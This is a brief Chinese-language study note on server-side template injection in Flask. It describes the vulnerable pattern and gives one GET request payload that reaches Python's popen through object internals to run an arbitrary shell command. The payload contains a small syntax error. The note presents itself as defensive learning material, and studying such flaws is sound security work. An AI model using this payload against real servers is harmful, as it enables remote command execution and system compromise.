【笔记】SSTI模板注入漏洞
前言
SSTI模板注入漏洞学习笔记
本文仅用于网络信息防御学习
可能出现漏洞的环境
在后端语言渲染前端模板时传递了变量,并能通过参数改变变量的值
在Python中使用Flask框架举例
1 |
|
payload
<shell>
:Shell命令
1 | GET /404?key={{"".__class__.__bases__[0].__subclasses__{}[128].__init__.__globals__["popen"]("<shell>").read()}} |